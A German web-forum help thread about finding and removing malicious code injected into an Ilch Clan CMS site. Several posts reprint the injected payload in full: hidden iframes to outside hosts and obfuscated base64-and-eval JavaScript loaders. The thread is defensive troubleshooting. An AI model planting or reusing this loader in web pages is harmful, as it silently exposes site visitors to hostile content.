ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Virus Eingefangen

Geschlossen
  1. Di. 20.12.2011 23:20 Uhr #1
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    seit Tagen bin ich am Entfernen eines Viruses vom Server.
    Nur noch im Admin Menü ist einer den bekomme ich nicht obwohl ich die Daten überspielt bzw. überschrieben habe.
    Er schreibt zwar admin.php aber dort ist er nicht.
    Hier der Quelltext:


    Unten die letzten Zeilen das ist der SPAM
    <iframe src="http://selen77.com/
    [code][/code]

    Wenn ich im Admin Menü auf User gehe oder Smilis bleibt der Werbebanner ("VIRUS") in der Mitte stehen.

    Was oder Wo soll ich noch suchen?

    betroffene Homepage: 1sta.de/HP
    0 Mitglieder finden den Beitrag gut.
  2. Di. 20.12.2011 23:21 Uhr #2
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Wie gesagt diese Werbung ist nur im Admin Menü zu sehen.
    Von der HP selbst habe ich weg bekommen.
    0 Mitglieder finden den Beitrag gut.
  3. Mi. 21.12.2011 07:17 Uhr #3
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    387 Beitragspunkte
    Naja sollte entweder in admin/templates/index.htm oder admin.php, ich tippe aber mal auf die index.htm da die besser ins Namensschema passt.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    1 Mitglieder finden den Beitrag gut.
  4. Mi. 21.12.2011 20:29 Uhr #4
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo Mairu,

    leider nichts gefunden!?
    Der ist gut Versteckt lächeln
    Suche schon jede einzelne Datei ab bzw. habe ja alles drüber kopiert.
    Bin am Verzweifeln.
    Nofalls gebe ich Dir mal meinen Zugang im Vertrauen
    0 Mitglieder finden den Beitrag gut.
  5. Mi. 21.12.2011 21:10 Uhr #5
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hammer habe fast jede Datei durchsucht finde den Code nicht.
    Was mache ich falsch?
    ?
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
        <center class="Cmite"><a href="http://www.ilch.de" target="_blank">Bereitgestellt von ilch.de</a></center>
     
        <a href="#" name="bot"></a>
     
        <SCRIPT LANGUAGE="JavaScript"><!--
          cmDraw ('myMenuID', myMenu, 'hbr', cmThemePanel, 'ThemePanel');
        --></SCRIPT>
      [b]<iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>[/b]
    </body>
    </html>
    0 Mitglieder finden den Beitrag gut.
  6. Mi. 21.12.2011 21:22 Uhr #6
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hi,


    so habe ALLE Ordner und Daten auf mein PC gezogen.
    Dann nach dem Namen von diesem Werbebanner gesucht www.selen77.com
    Folgende Datein wurden gefunden die damit Infiziert waren:
    login.htm
    showtopic.htm
    Hat aber nichts gebracht.
    Suchte dann aud diese Art weiter auf den ganzen Ordnern und fand ca. weitere 50 solcher Einträge.
    Lösche gerade alles.


    Zuletzt modifiziert von 1sta am 21.12.2011 - 22:04:21
    0 Mitglieder finden den Beitrag gut.
  7. Mi. 21.12.2011 22:36 Uhr #7
    User Pic
    deinem_klodecke Mitglied
    Registriert seit
    23.11.2011
    Beiträge
    70
    Beitragswertungen
    0 Beitragspunkte
    mal ne frage wie hast dir den eingefangen?
    0 Mitglieder finden den Beitrag gut.
  8. Mi. 21.12.2011 23:10 Uhr #8
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.681
    Beitragswertungen
    1218 Beitragspunkte
    Hast Du die von Mairu genannten Dateien durchsucht?
    STRG+F "selen"
    rules :: doku :: faq :: linkus
    1 Mitglieder finden den Beitrag gut.
  9. Mi. 21.12.2011 23:54 Uhr #9
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    eingefangen habe ich mir einen Werbebanner der sich auf jeder der 3 Domains/Seiten eingeschlichen hat.
    www.1sta.de
    www.1sta.de/HP
    www.clanking.eu
    Zu sehen auf dem Foto.
    Ist ein Russisches Werbebanner

    Vermutlich mit dem Programm Wordpress/Tinythump (Clanking.eu) oder wie das Addon heißt.


    Habe die Datein mit dem Editor durchsucht.
    Versuche es mal mit Strg+F
    0 Mitglieder finden den Beitrag gut.
  10. Do. 22.12.2011 20:07 Uhr #10
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    leider nein auch nicht mit Strg.+F was gefunden?!
    :'(
    0 Mitglieder finden den Beitrag gut.
  11. Do. 22.12.2011 23:42 Uhr #11
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.681
    Beitragswertungen
    1218 Beitragspunkte
    Wenn Du es wirklich nicht findest, sende mir mal, sofern Du möchtest, die FTP Zugangsdaten zu und ich schau es mir mal an!
    rules :: doku :: faq :: linkus
    0 Mitglieder finden den Beitrag gut.
  12. Fr. 23.12.2011 21:03 Uhr #12
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    das wäre Super von Dir.
    Kennen uns zwar nicht aber als Admins vertraue ich Dir lächeln
    Sende Sie dir per PM zu.
    Bin gespannt wo dieser Code nun liegt.

    LG.Andi
    0 Mitglieder finden den Beitrag gut.
  13. Fr. 23.12.2011 22:17 Uhr #13
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.681
    Beitragswertungen
    1218 Beitragspunkte
    Problem gelöst!

    Schadcode in HP/include/admin/templates/index.htm, welcher aufgrund verschachteler Doppelinstallation nicht gleich gefunden werden konnte.

    Ändere bitte noch die Passwörter (FTP/Datenbank)!
    Unbedingt gem. dieser Angabe noch die Chmods anpassen!

    PS: Habe Dir schnell noch die notwendigsten Rechte angepasst, da viele Dateien 777 (incl. der config) hatten!


    Zuletzt modifiziert von Lord|Schirmer am 23.12.2011 - 22:26:32
    rules :: doku :: faq :: linkus
    0 Mitglieder finden den Beitrag gut.
  14. Sa. 24.12.2011 08:19 Uhr #14
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Danke Dir LordSchirmer für die Hilfe:)
    Auch Danke an Mairu.

    Sowas gibt es nicht oft das so schnell geholfen wird in einem Forum.
    Wünsche Euch ein Frohes Fest heute Abend.
    Dank Eurer Hilfe habe ich das "größte" Problem gelöst und kann in Ruhe Feiern mit den Kindern:P

    LG.Andreas
    0 Mitglieder finden den Beitrag gut.
  15. Sa. 07.01.2012 18:36 Uhr #15
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    es wurde noch so ein Schade Code entdeckt durch zufall.
    habe ein falsches PW eingegeben da ist es aufgetaucht.
    Welche PHP ist das?
    0 Mitglieder finden den Beitrag gut.
  16. Sa. 07.01.2012 18:40 Uhr #16
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    klingt nach login.htm, include/templates/user
    gametasy.de >>
    youtube.com/gametasyde >>
    1 Mitglieder finden den Beitrag gut.
  17. Sa. 07.01.2012 18:48 Uhr #17
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Danke für die schnelle Info.
    Sobald ich wieder sn den Laptop kann (mit Serverzugang) melde ich mich wieder.

    Gruß Andi
    0 Mitglieder finden den Beitrag gut.
  18. Sa. 07.01.2012 18:51 Uhr #18
    User Pic
    T3BAss Mitglied
    Registriert seit
    21.12.2011
    Beiträge
    133
    Beitragswertungen
    18 Beitragspunkte
    Das gehört glaube ich nicht in den Code oder?

    ?
    1
    2
    3
    <iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>


    Steht ganz unten, wurde also wahrscheinlich über die design klasse dort angefügt.

    schau mal in die include/contents/user/login.php und poste die hier
    1 Mitglieder finden den Beitrag gut.
  19. Sa. 07.01.2012 18:56 Uhr #19
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    GENAU das ist der Code.
    Haben den schon auf dem Server insg. gefühlte 80 msl gelöscht.
    War auch lange Ruhe bzw. jetzt durch zufall gesehen das einer überlebt hat lächeln
    Ja melde mich wieder
    0 Mitglieder finden den Beitrag gut.
  20. Sa. 07.01.2012 19:16 Uhr #20
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    komme leider noch nicht an den rechner.
    hier am handy habe ich den code auch unter der regestrierung gesehen -.-
    hier meine seite www.1sta.de/Hp
    0 Mitglieder finden den Beitrag gut.
  21. Sa. 07.01.2012 19:26 Uhr #21
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    Ich werd mal sicherheitshalber deine links vermeiden^^
    gametasy.de >>
    youtube.com/gametasyde >>
    0 Mitglieder finden den Beitrag gut.
  22. Sa. 07.01.2012 19:31 Uhr #22
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ne ist nur ein werbebanner zu sehen auf russisch.
    diesen nicht anklicken denn der leitet auf porno seiten um :))
    0 Mitglieder finden den Beitrag gut.
  23. Sa. 07.01.2012 19:59 Uhr #23
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    naja, wenn der javascript code iwas im .load der seite macht :p
    gametasy.de >>
    youtube.com/gametasyde >>
    0 Mitglieder finden den Beitrag gut.
  24. So. 08.01.2012 17:34 Uhr #24
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ZitatZitat geschrieben von Forcey

    klingt nach login.htm, include/templates/user


    Hallo,

    da habe ich nichts gefunden

    0 Mitglieder finden den Beitrag gut.
  25. So. 08.01.2012 17:40 Uhr #25
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ZitatZitat geschrieben von T3BAss

    Das gehört glaube ich nicht in den Code oder?

    ?
    1
    2
    3
    <iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>


    Steht ganz unten, wurde also wahrscheinlich über die design klasse dort angefügt.

    schau mal in die include/contents/user/login.php und poste die hier


    Treffer das war er lächeln
    Hatte ich übersehen.
    Danke Euch!

    Gibt es eigentlich ein Programm das meine Server Dateien auf Viren oder Stichwörter durchsucht z.b wie in diesem Fall die Adresse selen777.com wo der Virus hinführte?
    0 Mitglieder finden den Beitrag gut.
  26. So. 08.01.2012 18:26 Uhr #26
    User Pic
    T3BAss Mitglied
    Registriert seit
    21.12.2011
    Beiträge
    133
    Beitragswertungen
    18 Beitragspunkte
    Auf jeden Fall gibt es da was ganz tolles: Sichere Passwörter, sichere ( geprüfte ) Skripte und einen professionellen Hoster, mit sicheren Servern.
    Wenn du das hast, wirst du zu 99,9% nie wieder solch Probleme haben.
    1 Mitglieder finden den Beitrag gut.
  27. So. 08.01.2012 18:45 Uhr #27
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    hatte noch nie Probleme.
    Gut vor kurzen den Hoster gewechselt zu All-Inkl. und mein Sohn hatte zusätzlich Wordpress auf dem Server install. und damit glaube hat alles angefangen mit einem Addon.
    Sage ich jetzt mal^^

    Habe auch damals (s.h erste Beiträge) ALLE Passwörter gewechselt.
    Sollte nun passen?

    Muß auch VBulletin mein Forum neu aufsetzen da es nicht mehr richtig läuft seit der Attacke, und die Fehlersuche mit hohen kosten verbunden ist -.-
    Durch das neu aufsetzen sollte nun alles sauber sein.
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten